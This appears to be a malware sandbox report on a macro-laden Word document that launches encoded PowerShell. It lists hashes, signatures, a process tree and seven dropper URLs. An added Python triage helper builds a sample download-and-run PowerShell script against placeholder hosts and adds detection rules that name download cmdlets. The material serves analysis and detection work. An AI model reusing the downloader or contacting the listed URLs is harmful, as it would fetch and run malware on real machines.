Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-09-2024 22:13

General

  • Target

    ee8691df830c8049a82b6742c7b87ab9_JaffaCakes118.doc

  • Size

    139KB

  • MD5

    ee8691df830c8049a82b6742c7b87ab9

  • SHA1

    fc0b9af297d018fd313934248f5e7e9aac4752da

  • SHA256

    a973fb7943766b57cd43a3411ebc0e4f2526142e27a0c7e259a0fdabd30a5596

  • SHA512

    52cf16dc38ff9391c343b4a3058b3da0d51a4b2a89ec3a066d61d0596fb01e9c239b01a7ec1cb9d87267555e467c9511ebc16eb0dbc2a0618077745109724eaf

  • SSDEEP

    1536:mxRD3bNqfNpu39IId5a6XP3Mg8afyqsTqc380Y:ER1qf69xak3MgxyHqI80Y

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    exe.dropper (applies to every URL below)
  • URLs
    http://edu.jmsvclass.com/wp-includes/sZmjSq/
    http://darkblessing.net/e4wftkpn/KNAO9/
    http://trancisconsulting.com/wp-admin/EEoF/
    http://devanyastore.com/wp-content/9J56juA/
    http://healthcureathome.com/ALFA_DATA/iKSdCK6/
    http://www.szwymall.com/wp-content/j29mvS/
    http://www.jornco.com/wp-admin/UT0xBJw/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee8691df830c8049a82b6742c7b87ab9_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1032
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD 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
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2960
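The command line in the tree above (`POwersheLL -ENCOD <base64>`) and the exe.dropper URL list in Malware Config are the two things an analyst wants to connect. The Python below is an added triage example, not part of the sandbox report or of any tool it uses: it decodes a -EncodedCommand argument (accepting the abbreviated and mixed-case spellings that powershell.exe itself accepts), pulls plain URLs out of the decoded script, and runs two process-creation rules over Sysmon-style events. The sample script and its placeholder hostnames, the event records (the explorer.exe parent for WINWORD.EXE, the blank parent for PID 2960, which the report does not show, and the extra cmd.exe event with PID 3100) are all constructed for illustration.

```python
# Added triage helper, not part of the sandbox report: decode a
# 'POwersheLL -ENCOD <base64>' command line, pull the drop URLs out of the
# script, and run two detection rules over Sysmon-style process events.
# The script, hostnames and event records below are constructed.
import base64
import binascii
import re
import shlex
from typing import Optional

# Assumed downloader one-liner in the style a macro hands to PowerShell: URLs
# joined by '@', tried in turn. Placeholder hosts, not the report's real URLs.
SAMPLE_SCRIPT = (
    "$u='http://a.example.invalid/wp-includes/x1/@http://b.example.invalid/wp-admin/y2/'.Split('@');"
    "$p=$env:TEMP+'\\k.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "if((Get-Item $p).Length -ge 30000){Start-Process $p;break}}catch{}}"
)

def encode_ps(script: str) -> str:
    """What powershell.exe expects after -EncodedCommand: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_CMDLINE = "POwersheLL -ENCOD " + encode_ps(SAMPLE_SCRIPT)

def _tokens(cmdline: str) -> list:
    """Split a Windows command line; quoted paths stay whole and lose their quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand,
    so '-ENCOD' is valid; a rule keyed on the literal '-EncodedCommand' misses it."""
    t = token.lstrip("-/").lower()
    return t in ("e", "ec") or (t.startswith("en") and "encodedcommand".startswith(t))

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decoded script if this is PowerShell with an encoded command, else None.
    All matching is case-insensitive: 'POwersheLL' defeats an as-is comparison."""
    try:
        toks = _tokens(cmdline)
    except ValueError:          # unbalanced quotes
        return None
    if not toks or _basename(toks[0]) not in ("powershell", "powershell.exe", "pwsh", "pwsh.exe"):
        return None
    for flag, arg in zip(toks, toks[1:]):
        if is_encoded_flag(flag):
            try:
                raw = base64.b64decode(arg, validate=True)
            except (binascii.Error, ValueError):
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None

URL_RE = re.compile(r"""https?://[^\s'"@;)\]]+""", re.I)
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest|"
                         r"Invoke-RestMethod|\biwr\b|\birm\b|Start-BitsTransfer", re.I)

def extract_urls(script: str) -> list:
    """Plain http(s) URLs in a decoded script; URLs assembled from fragments at
    runtime show up as none and need manual deobfuscation."""
    return URL_RE.findall(script)

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

def evaluate(events: list) -> list:
    """(rule, pid, detail) per event that trips a rule. The second rule ignores the
    parent on purpose: the script host need not be a direct child of Office."""
    alerts = []
    for ev in events:
        image, parent = _basename(ev["Image"]), _basename(ev.get("ParentImage", ""))
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            alerts.append(("office_spawns_script_host", ev["ProcessId"], image))
        script = decode_encoded_command(ev["CommandLine"])
        if script is not None and (DOWNLOAD_RE.search(script) or extract_urls(script)):
            alerts.append(("encoded_powershell_downloader", ev["ProcessId"], extract_urls(script)))
    return alerts

# Constructed events shaped like the report's tree. PID 2960 carries SAMPLE_SCRIPT
# (the real one is redacted) with a blank parent, since the report shows none;
# the explorer.exe parent and the whole cmd.exe event (PID 3100) are made up.
SAMPLE_EVENTS = [
    {"ProcessId": 2736, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"'},
    {"ProcessId": 1032, "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ProcessId": 2960, "ParentImage": "",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe", "CommandLine": SAMPLE_CMDLINE},
    {"ProcessId": 3100, "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for rule, pid, detail in evaluate(SAMPLE_EVENTS):
        print(rule, pid, detail)
```

Two points the rules encode. First, powershell.exe resolves any unambiguous prefix of a parameter name, so -ENCOD, -enc and -e all mean -EncodedCommand, and the image name is compared case-insensitively because Windows does not care about the case of "POwersheLL". Second, the encoded-command rule deliberately ignores the parent process: the tree above lists the PowerShell process at the same level as WINWORD.EXE rather than beneath it, so a rule that only looks for Office spawning a script host would not fire on it, while the decoded script and its URLs are visible regardless of who the parent was.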

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      56122b893fb0b37784f95ff7000e434a

      SHA1

      0d4fc9f3c141174e1eaa7ba7260bfbd426a8aa7b

      SHA256

      00ea5a078101bccc78bb0cbcaf61d449ddf7b7d97be3c98b9be17496286aeca9

      SHA512

      6c5073c222a8aa8656c553d3bbd2159dd5b091d865fce34c52772442fe2b0b8fb66c7b8f269b718959cc2b6328f8d149c1ea4f8616789166eaa41aca43c9dc2e

    • memory/2736-32-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-86-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2736-6-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-5-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-7-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-10-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-19-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-14-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-28-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-24-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-20-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-18-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-16-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-15-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-13-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-12-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-40-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-9-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-8-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-37-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-36-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-0-0x000000002F7B1000-0x000000002F7B2000-memory.dmp

      Filesize

      4KB

    • memory/2736-43-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-2-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2736-11-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-47-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-48-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-46-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-41-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-38-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-39-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2736-31-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-30-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-29-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-87-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2736-42-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-56-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-61-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-66-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-67-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-68-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-69-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-70-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2960-55-0x0000000002220000-0x0000000002228000-memory.dmp

      Filesize

      32KB

    • memory/2960-54-0x000000001B280000-0x000000001B562000-memory.dmp

      Filesize

      2.9MB